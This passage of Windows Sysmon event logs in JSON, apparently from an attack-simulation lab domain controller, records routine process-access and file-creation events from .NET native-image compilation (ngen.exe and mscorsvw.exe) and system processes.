C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.404","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.482\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.482","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.482\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.482","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:16.794\r\nProcessGuid: {E2A3D6B1-1378-5F25-0000-0010DC410F00}\r\nProcessId: 5036\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Net.dll\r\nCreationUtcTime: 2020-08-01 07:02:16.794","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:16.794","ProcessGuid":"{E2A3D6B1-1378-5F25-0000-0010DC410F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Net.dll","CreationUtcTime":"2020-08-01 07:02:16.794","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.826\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010BFD80E00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.826","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010BFD80E00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.826\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010BFD80E00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.826","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010BFD80E00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.841\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-001043450F00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.841","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-001043450F00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.873\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-001074480F00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.873","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-001074480F00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 